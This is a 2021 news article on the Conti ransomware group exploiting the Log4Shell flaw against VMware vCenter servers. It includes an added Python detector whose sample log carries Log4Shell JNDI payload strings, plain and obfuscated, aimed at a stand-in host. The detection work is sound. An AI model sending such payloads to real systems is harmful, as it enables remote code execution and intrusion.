20 December 2021

Conti ransomware group targets vulnerable VMware vCenter servers using Log4Shell exploit

Conti has become the first major ransomware group to incorporate the Log4Shell vulnerability (CVE-2021-44228) in their operation. According to a new report from Advanced Intelligence, since December 13, the group has been seen targeting vulnerable VMware vCenter servers using the publicly available exploit for CVE-2021-44228 in order to gain access to enterprise networks.

“On December 12, through deep visibility into adversarial collections, AdvIntel discovered that multiple Conti group members expressed interest in the exploitation of the vulnerability for the initial attack vector resulting in the scanning activity leveraging the publicly available Log4J2 exploit. This is the first time this vulnerability entered the radar of a major ransomware group,” the researchers said.

“It is only a matter of time until Conti and possibly other groups will begin exploiting Log4j2 to its full capacity. It is recommended to patch the vulnerable system immediately and view Log4j2 as a ransomware group exploitation vector,” they warned.

CVE-2021-44228 affects Log4j, a Java library for logging error messages in applications. It is a remote code injection vulnerability that exists due to improper input validation when processing LDAP requests, and it could be abused by threat actors to hijack servers and apps over the internet. The disclosure of the flaw caused widespread alarm because Log4j is widely used in commonly deployed enterprise systems.
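As an added illustration (not part of the article or of AdvIntel's report), the following Python scans web access log lines for the JNDI lookup strings that trigger CVE-2021-44228, collapsing the nested lookups and URL encoding that defeat a plain substring search before matching. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not from the article). Lines 2-4
# carry JNDI lookup strings in the plain, nested-lookup and URL-encoded forms
# seen in Log4Shell scanning; line 5 is a benign "${...}" that must not match.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
203.0.113.9 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"
203.0.113.9 - - [13/Dec/2021:10:01:12 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.79"
198.51.100.4 - - [13/Dec/2021:10:02:00 +0000] "GET /price?total=${amount} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

INNERMOST = re.compile(r"\$\{([^${}]*)\}")             # a ${...} with nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)  # the lookup Log4j would act on


def _resolve(body: str):
    """Evaluate the simple lookups that get nested to hide the word 'jndi':
    ${x:-j} / ${::-j} (default-value syntax) and ${lower:J} / ${upper:j}.
    Anything else, including the jndi: lookup itself, is left untouched."""
    if body.lower().startswith("jndi:"):
        return None
    if ":-" in body:
        return body.rsplit(":-", 1)[1]
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.I)
    if m:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return None


def _collapse(m: re.Match) -> str:
    r = _resolve(m.group(1))
    return m.group(0) if r is None else r


def normalize_lookups(s: str) -> str:
    """Collapse innermost lookups repeatedly until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        s = INNERMOST.sub(_collapse, s)
    return s


def scan_access_log(text: str):
    """Return (line number, client IP, JNDI scheme) for every line whose
    URL-decoded, de-obfuscated form contains a ${jndi:...} lookup."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = JNDI.search(normalize_lookups(unquote(line)))
        if m:
            hits.append((lineno, line.split(" ", 1)[0], m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for lineno, ip, scheme in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme} from {ip}")
```

Matches on a patched host still show who is scanning; matches on an unpatched one are the trigger for the incident response the report urges.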

The Dutch National Cyber Security Center released a lengthy list of software affected by CVE-2021-44228.

Conti is a sophisticated Ransomware-as-a-Service (RaaS) model first detected in December 2019. In typical Conti ransomware attacks, malicious actors steal files, encrypt servers and workstations, and demand a ransom payment. In September, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) said they had observed the Conti ransomware being used in more than 400 attacks, mainly in North America and Europe.

Last month, researchers from the cybersecurity firm Prodaft exposed the real IP address of one of the servers hosting the payment portal used by the Conti ransomware group to conduct negotiations with victims. The researchers were able to obtain insider data on the Conti RaaS group and its platform, including information on its management panel, and accessed the console for more than a month. They gained access to the gang’s recovery service and an admin management panel hosted as a TOR hidden service, and located the subject management panel mainly used for managing victims, affiliate accounts, and uploaded files.
